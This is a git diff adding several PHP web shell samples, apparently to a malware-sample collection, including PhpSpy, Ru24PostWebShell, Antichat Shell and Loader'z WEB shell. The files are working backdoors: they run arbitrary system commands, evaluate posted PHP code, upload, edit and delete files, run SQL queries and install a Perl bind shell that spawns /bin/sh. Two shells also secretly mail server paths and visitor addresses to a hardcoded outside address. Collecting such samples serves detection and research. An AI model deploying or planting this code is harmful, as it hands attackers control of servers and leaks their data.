'; + +function rphr($_8be065792f9eec8d918c4f68366fc910) + { + $_0609efb0bd944720d85b944586f4dcc7 = @preg_split("//", $_8be065792f9eec8d918c4f68366fc910); + $_4f901119c5ddebb5aa98afc37062ae17 = $_0609efb0bd944720d85b944586f4dcc7[@rand(0, @count($_0609efb0bd944720d85b944586f4dcc7) - 1)]; + $_8be065792f9eec8d918c4f68366fc910 = @str_replace($_4f901119c5ddebb5aa98afc37062ae17, $GLOBALS['TDshell']->make_link(@base64_decode("OTQ1VU84VUVSLTQzOFVFOVJJT0dILTVZUlRHVTlJT1JUTkhHRTVULTQzNVRVR0ZJNUgzNFRBVzk4NC00LTMtMzQ1VERGUw=="), NULL, $_4f901119c5ddebb5aa98afc37062ae17), $_8be065792f9eec8d918c4f68366fc910); + return $_8be065792f9eec8d918c4f68366fc910; + } + +$TDshell->TDshell_template["HTML_FOOTER_MAIN"] = ''; +$TDshell->init(); + diff --git a/PHP/Backdoor.PHP.WebShell.a b/PHP/Backdoor.PHP.WebShell.a new file mode 100644 index 00000000..b0c71fc9 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.a @@ -0,0 +1,810 @@ +"; + echo "×¢Ïú³É¹¦......

ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>>"; + exit; + } + if ($_POST['action'] == "login") { + $adminpass=trim($_POST['adminpass']); + if ($adminpass==$admin['pass']) { + $_SESSION['adminpass'] = $admin['pass']; + echo ""; + echo "µÇ½³É¹¦......

ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>>"; + exit; + } + } + if (session_is_registered('adminpass')) { + if ($_SESSION['adminpass']!=$admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } + } else { + /*------- cookie ÑéÖ¤ -------*/ + if ($_GET['action'] == "logout") { + setcookie ("adminpass", ""); + echo ""; + echo "×¢Ïú³É¹¦......

ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>>"; + exit; + } + if ($_POST['action'] == "login") { + $adminpass=trim($_POST['adminpass']); + if ($adminpass==$admin['pass']) { + setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); + echo ""; + echo "µÇ½³É¹¦......

ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>>"; + exit; + } + } + if (isset($_COOKIE['adminpass'])) { + if ($_COOKIE['adminpass']!=$admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } + } + +}//end check +/*===================== ÑéÖ¤½áÊø =====================*/ + +// ÅÐ¶Ï magic_quotes_gpc ״̬ +if (get_magic_quotes_gpc()) { + $_GET = stripslashes_array($_GET); + $_POST = stripslashes_array($_POST); +} + +// ÏÂÔØÎļþ +if (!empty($downfile)) { + if (!@file_exists($downfile)) { + echo ""; + } else { + $filename = basename($downfile); + $filename_info = explode('.', $filename); + $fileext = $filename_info[count($filename_info)-1]; + header('Content-type: application/x-'.$fileext); + header('Content-Disposition: attachment; filename='.$filename); + header('Content-Description: PHP3 Generated Data'); + @readfile($downfile); + exit; + } +} + +// ³ÌÐòĿ¼(Îļþϵͳ) +$pathname=str_replace('\\','/',dirname(__FILE__)); + +// »ñÈ¡µ±Ç°Â·¾¶ +if (!isset($dir) or empty($dir)) { + $dir = "."; + $nowpath = getPath($pathname, $dir); +} else { + $dir=$_GET['dir']; + $nowpath = getPath($pathname, $dir); +} + +// Åж϶ÁдÇé¿ö +if (dir_writeable($nowpath)) { + $dir_writeable = "¿Éд"; +} else { + $dir_writeable = "²»¿Éд"; +} + +$dis_func = get_cfg_var("disable_functions"); +$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO" : ""; +$shellmode=(!get_cfg_var("safe_mode")) ? " | WebShellģʽ" : ""; +?> + + + +PhpSpy Ver 1.5 + + + + +

+

×¢Ïú»á»° | ·µ»Ø¸ùĿ¼ | PHP»·¾³±äÁ¿ | SQL²éѯ | Version 1.5

+ + + + + + + + + + + + + + + + + + + + + + +

³ÌÐò·¾¶:
µ±Ç°Ä¿Â¼(,): +
ÌøתĿ¼: + + ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½ +

ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: + +
н¨ÎļþÔÚµ±Ç°Ä¿Â¼: + + +
н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: + + +
+
+\n"; +// ɾ³ýÎļþ +if(@$delfile!="") { + if(file_exists($delfile)) { + @unlink($delfile); + echo "".$delfile." ɾ³ý³É¹¦!"; + } else { + echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!"; + } +} + +// ɾ³ýĿ¼ +elseif($_POST['action'] == "rmdir") { + if($deldir!="") { + $deldirs="$dir/$deldir"; + if(!file_exists("$deldirs")) { + echo "Ŀ¼ÒѲ»´æÔÚ!"; + } else { + deltree($deldirs); + } + } else { + echo "ɾ³ýʧ°Ü!"; + } +} + +// ´´½¨Ä¿Â¼ +elseif($_POST['action'] == "createdirectory") { + if(!empty($newdirectory)) { + $mkdirs="$dir/$newdirectory"; + if(file_exists("$mkdirs")) { + echo "¸ÃĿ¼ÒÑ´æÔÚ!"; + } else { + echo $msg=@mkdir("$mkdirs",0777) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!"; + @chmod("$mkdirs",0777); + } + } +} + +// ÉÏ´«Îļþ +elseif($_POST['action'] == "uploadfile") { + echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; +} + +// ±à¼­Îļþ +elseif($_POST['action'] == "doeditfile") { + $filename="$dir/$editfilename"; + @$fp=fopen("$filename","w"); + echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!"; + @fclose($fp); +} + +// ±à¼­ÎļþÊôÐÔ +elseif($_POST['action'] == "editfileperm") { + $fileperm=base_convert($_POST['fileperm'],8,10); + echo $msg=@chmod($dir."/".$file,$fileperm) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!"; + echo " [".$file."] Ð޸ĺóµÄÊôÐÔΪ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4).""; +} + +// Á¬½ÓMYSQL +elseif($connect) { + if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { + echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!"; + } else { + echo mysql_error(); + } +} + +// Ö´ÐÐSQLÓï¾ä +elseif($doquery) { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $result = @mysql_query($_POST['sql_query']); + if ($result) { + echo "SQLÓï¾ä³É¹¦Ö´ÐÐ"; + }else{ + echo "³ö´í: ".mysql_error(); + } + mysql_close(); +} + +// ²é¿´PHPÅäÖòÎÊý×´¿ö +elseif($_POST['action'] == "viewphpvar") { + echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; +} + +else { + echo "±¾³ÌÐòÓÉ Security Angel °²È«×éÖ¯ angel[BST] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ http://www.4ngel.net ÏÂÔØ×îа汾."; +} + +echo "

\n"; +/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/ + +if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { +?> + + + + + + + + +\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + } else { + if($file=="..") { + echo "\n"; + echo " \n"; + echo "\n"; + } + } + $dir_i++; + } +}//while +@closedir($dirs); + +// ÎļþÁбí +$dirs=@opendir($dir); +while ($file=@readdir($dirs)) { + $b="$dir/$file"; + $a=@is_dir($b); + if($a=="0"){ + $size=@filesize("$dir/$file"); + $size=$size/1024 ; + $size= @number_format($size, 3); + $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file")); + @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4); + echo "\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + $file_i++; + } +} +@closedir($dirs); + +echo "\n"; +echo " \n"; +echo "\n"; +?> +
ÎļþÐÞ¸ÄÈÕÆÚ´óСÊôÐÔ²Ù×÷
[$file]$lastsave<dir>$dirpermɾ³ý
·µ»ØÉϼ¶Ä¿Â¼
$file$lastsave$size KB$filepermÏÂÔØ | ±à¼­ | ɾ³ý
".$dir_i." ¸öĿ¼
".$file_i." ¸öÎļþ
+ + + + + + + + + + + + + + + + + +
н¨/±à¼­Îļþ [·µ»Ø]
µ±Ç°Îļþ: ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ
+ +
+ + + + + + + + + + + + + + + + +
WebShell Mode
Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.
+ Ñ¡ÔñÖ´Ðк¯Êý: + ¡¡ + ÊäÈëÃüÁî: + +
+ +

Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.

+ + + + + + + + + + + + + +
ɾ³ý Ŀ¼
×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?
+ + +
+ + + + + + + + + + +
ÐÞ¸ÄÎļþÊôÐÔ [·µ»Ø]
µÄÊôÐÔΪ: + " class="input"> + + +
+ + + + + + + + + + + + + + + + +
Ö´ÐÐ SQL Óï¾ä
Host: + + User: + + Pass: + + DB: + +
+".$_SERVER["SERVER_ADMIN"]."" : "".get_cfg_var("sendmail_from").""; + + $dis_func = get_cfg_var("disable_functions"); + if ($dis_func == "") { + $dis_func = "No"; + }else { + $dis_func = str_replace(" ","
",$dis_func); + $dis_func = str_replace(",","
",$dis_func); + } + + $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; + + $info[0] = array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())); + $info[1] = array("·þÎñÆ÷ÓòÃû","$_SERVER[SERVER_NAME]"); + $info[2] = array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER["SERVER_NAME"])); + $info[3] = array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS); + $info[5] = array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER["HTTP_ACCEPT_LANGUAGE"]); + $info[6] = array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER["SERVER_SOFTWARE"]); + $info[7] = array("Web·þÎñ¶Ë¿Ú",$_SERVER["SERVER_PORT"]); + $info[8] = array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name())); + $info[9] = array("PHP°æ±¾",PHP_VERSION); + $info[10] = array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode")); + $info[11] = array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail); + $info[12] = array("±¾Îļþ·¾¶",__FILE__); + + $info[13] = array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen")); + $info[14] = array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")); + $info[15] = array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors")); + $info[16] = array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")); + $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")); + $info[18] = array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")); + $info[19] = array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size")); + $info[20] = array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize); + $info[21] = array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"); + $info[22] = array("±»½ûÓõĺ¯Êý disable_functions",$dis_func); + $info[23] = array("phpinfo()",$phpinfo); + $info[24] = array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'); + + $info[25] = array("ͼÐδ¦Àí GD Library",getfun("imageline")); + $info[26] = array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close")); + $info[27] = array("MySQLÊý¾Ý¿â",getfun("mysql_close")); + $info[28] = array("SyBaseÊý¾Ý¿â",getfun("sybase_close")); + $info[29] = array("OracleÊý¾Ý¿â",getfun("ora_close")); + $info[30] = array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff")); + $info[31] = array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match")); + $info[32] = array("PDFÎĵµÖ§³Ö",getfun("pdf_close")); + $info[33] = array("Postgre SQLÊý¾Ý¿â",getfun("pg_close")); + $info[34] = array("SNMPÍøÂç¹ÜÀíЭÒé",getfun("snmpget")); + $info[35] = array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose")); + $info[36] = array("XML½âÎö",getfun("xml_set_object")); + $info[37] = array("FTP",getfun("ftp_login")); + $info[38] = array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close")); + $info[39] = array("SessionÖ§³Ö",getfun("session_start")); + $info[40] = array("SocketÖ§³Ö",getfun("fsockopen")); +?> + + + + + + + + + + + + + + + + +"; +}//end phpenv +?> +
+
²é¿´PHPÅäÖòÎÊý×´¿ö
ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):
+ +\n"; + } + }elseif($a == 1){ + for($i=13;$i<=24;$i++){ + echo "\n"; + } + }elseif($a == 2){ + for($i=25;$i<=40;$i++){ + echo "\n"; + } + } +?> +
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
+
+ + + + +
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.
+
+ + + + + +
+ Password: + +
+read()) { + if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { + @chmod("$deldir/$file",0777); + deltree("$deldir/$file"); + } + if (is_file("$deldir/$file")) { + @chmod("$deldir/$file",0777); + @unlink("$deldir/$file"); + } + } + $mydir->close(); + @chmod("$deldir",0777); + echo @rmdir($deldir) ? "Ŀ¼ɾ³ý³É¹¦!" : "Ŀ¼ɾ³ýʧ°Ü!"; + } + + // Åж϶ÁдÇé¿ö + function dir_writeable($dir) { + if (!is_dir($dir)) { + @mkdir($dir, 0777); + } + if(is_dir($dir)) { + if ($fp = @fopen("$dir/test.txt", 'w')) { + @fclose($fp); + @unlink("$dir/test.txt"); + $writeable = 1; + } else { + $writeable = 0; + } + } + return $writeable; + } + + // ±í¸ñÐмäµÄ±³¾°É«Ìæ»» + function getrowbg() { + global $bgcounter; + if ($bgcounter++%2==0) { + return "firstalt"; + } else { + return "secondalt"; + } + } + + // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ + function getPath($mainpath, $relativepath) { + global $dir; + $mainpath_info = explode('/', $mainpath); + $relativepath_info = explode('/', $relativepath); + $relativepath_info_count = count($relativepath_info); + for ($i=0; $i<$relativepath_info_count; $i++) { + if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; + if ($relativepath_info[$i] == '..') { + $mainpath_info_count = count($mainpath_info); + unset($mainpath_info[$mainpath_info_count-1]); + continue; + } + $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; + } //end for + return implode('/', $mainpath_info); + } + + // ¼ì²éPHPÅäÖòÎÊý + function getphpcfg($varname) { + switch($result = get_cfg_var($varname)) { + case 0: + return No; + break; + case 1: + return Yes; + break; + default: + return $result; + break; + } + } + + // ¼ì²éº¯ÊýÇé¿ö + function getfun($funName) { + return (false !== function_exists($funName)) ? Yes : No; + } +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.aa b/PHP/Backdoor.PHP.WebShell.aa new file mode 100644 index 00000000..b374c746 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.aa @@ -0,0 +1,23 @@ + + +Ru24PostWebShell - ".$_POST['cmd']." + +"; +echo "
"; +echo ""; +echo "
"; +echo "
";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."
"; + + +?> diff --git a/PHP/Backdoor.PHP.WebShell.ab b/PHP/Backdoor.PHP.WebShell.ab new file mode 100644 index 00000000..91e9bddf --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ab @@ -0,0 +1,3 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.ac b/PHP/Backdoor.PHP.WebShell.ac new file mode 100644 index 00000000..e3d61d41 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ac @@ -0,0 +1,3 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.ad b/PHP/Backdoor.PHP.WebShell.ad new file mode 100644 index 00000000..a585e3c9 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ad @@ -0,0 +1,180 @@ +BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}'; +$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; +$footer=''; +$sd98 = "john.barker446@gmail.com"; +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); +if(@$_POST['action']=="exit")unset($_SESSION['an']); +if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; + +if($_SESSION['an']==0){ +echo $header; +echo '
Login:
Password:
'; +echo $footer; +exit;} + +if($_SESSION['action']=="")$_SESSION['action']="viewer"; +if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; +if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; +if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} + + +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file); +} +//end downloader +?> + + +
+ + + + + +
| Shell | Viewer| Editor| EXIT |

+
+ + + +
+ +
+ + + +
+
+";} +//end shell + +//viewer FS +function perms($file) +{ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info; +} + +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} + +function scandire($dir){ + $dir=chdir($dir); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); +if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + +echo ""; +echo ""; +if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { +echo ""; +} +echo " +"; +for($i=0;$i'; + } +for($i=0;$i + +'; +} +echo "
Open directory:
Select drive:"; +for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + echo ' '.chr($j).''; + echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' +D +E
"; +}}} + +if($action=="viewer"){ +scandire($dir); +} +//end viewer FS + +//editros +if($action=="editor"){ + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); + } + function readf($file){ + if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else { + $contents = fread($le, filesize($file)); + fclose($le);} + return htmlspecialchars($contents); + } +if($_POST['save'])writef($file,$_POST['data']); +echo "
+ + +
+
"; +} +//end editors +?> +
COPYRIGHT BY ANTICHAT.RU
+ diff --git a/PHP/Backdoor.PHP.WebShell.ae b/PHP/Backdoor.PHP.WebShell.ae new file mode 100644 index 00000000..2f60b8c2 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ae @@ -0,0 +1,513 @@ + + + + + + + +Loader'z WEB shell + + + + + + +
+ + +
+&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +";} + +function decode($buffer){ + +return convert_cyr_string ($buffer, 'd', 'w'); + +} + + + +function execute($com) +{ + + if (!empty($com)) + { + if(function_exists('exec')) + { + exec($com,$arr); + echo implode(' +',$arr); + } + elseif(function_exists('shell_exec')) + { + echo shell_exec($com); + + + } + elseif(function_exists('system')) +{ + + echo system($com); +} + elseif(function_exists('passthru')) + { + + echo passthru($com); + + } +} + +} + + +function perms($mode) +{ + +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + + + +/*Íà÷èíàåòñÿ*/ + +/*Îïðåäåëÿåì òèï ñèñòåìû*/ +$servsoft = $_SERVER['SERVER_SOFTWARE']; + +if (ereg("Win32", $servsoft, $reg)){ +$sertype = "winda"; +} +else +{ +$sertype = "other";} + + + +echo $servsoft . "
"; +chdir($dir); +echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb
";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); + + + + + +if (ini_get('safe_mode') <> 1){ +if ($sertype == "winda"){ + +ob_start('decode'); +echo "OS: "; +echo execute("ver") . "
"; +ob_end_flush(); +} + +if ($sertype == "other"){ +echo "id:"; + +echo execute("id") . "
"; +echo "uname:" . execute('uname -a') . "
"; +}} +else{ +if ($sertype == "winda"){ + +echo "OS: " . php_uname() . "
"; + +} + +if ($sertype == "other"){ +echo "id:"; + +echo execute("id") . "
"; +echo "OS:" . php_uname() . "
"; +} +} + +echo 'User: ' .get_current_user() . '
'; + + + +if (ini_get("open_basedir")){ +echo "open_basedir: " . ini_get("open_basedir");} + + +if (ini_get('safe_mode') == 1){ +echo "Safe mode :("; + +if (ini_get('safe_mode_include_dir')){ +echo "Including from here: " . ini_get('safe_mode_include_dir'); } +if (ini_get('safe_mode_exec_dir')){ +echo " Exec here: " . ini_get('safe_mode_exec_dir'); +} +echo "";} + + + + +if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") +{ +copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); +} + +if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) + +{ +$data = implode("", file($_POST['filefrom'])); +$fp = fopen($_POST['fileto'], "wb"); +fputs($fp, $data); +$ok = fclose($fp); +if($ok) +{ +$size = filesize($_POST['fileto'])/1024; +$sizef = sprintf("%.2f", $size); +print "
Download - OK. (".$sizef."êÁ)
"; +} +else +{ +print "
Something is wrong. Download - IS NOT OK
"; +} +} + +if (isset($_POST['installbind'])){ + +if (is_dir($_POST['installpath']) == true){ +chdir($_POST['installpath']); +$_POST['installpath'] = "temp.pl";} + + +$fp = fopen($_POST['installpath'], "w"); +fwrite($fp, $bind); +fclose($fp); + +exec("perl " . $_POST['installpath']); +chdir($dir); + + +} + + +@$ef = stripslashes($_POST['editfile']); +if ($ef){ +$fp = fopen($ef, "r"); +$filearr = file($ef); + + + +$string = ''; +$content = ''; +foreach ($filearr as $string){ +$string = str_replace("<" , "<" , $string); +$string = str_replace(">" , ">" , $string); +$content = $content . $string; +} + +echo "
Edit file: $ef
+ +
+
"; +fclose($fp); +} + +if(isset($_POST['savefile'])){ + +$fp = fopen($_POST['savefile'], "w"); +$content = stripslashes($content); +fwrite($fp, $content); +fclose($fp); +echo "
Successfully saved!
"; + +} + + +if (isset($_POST['php'])){ + +echo "
PHP code

+
"; +} + + + +if(isset($_POST['phpcode'])){ + +echo "
Results of PHP execution

"; +@eval(stripslashes($_POST['phpcode'])); +echo "
"; + + +} + + +if ($cmd){ + +if($sertype == "winda"){ +ob_start(); +execute($cmd); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} +else{ +ob_start(); +echo decode(execute($cmd)); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} + +if (trim($buffer)){ +echo "
Command: $cmd
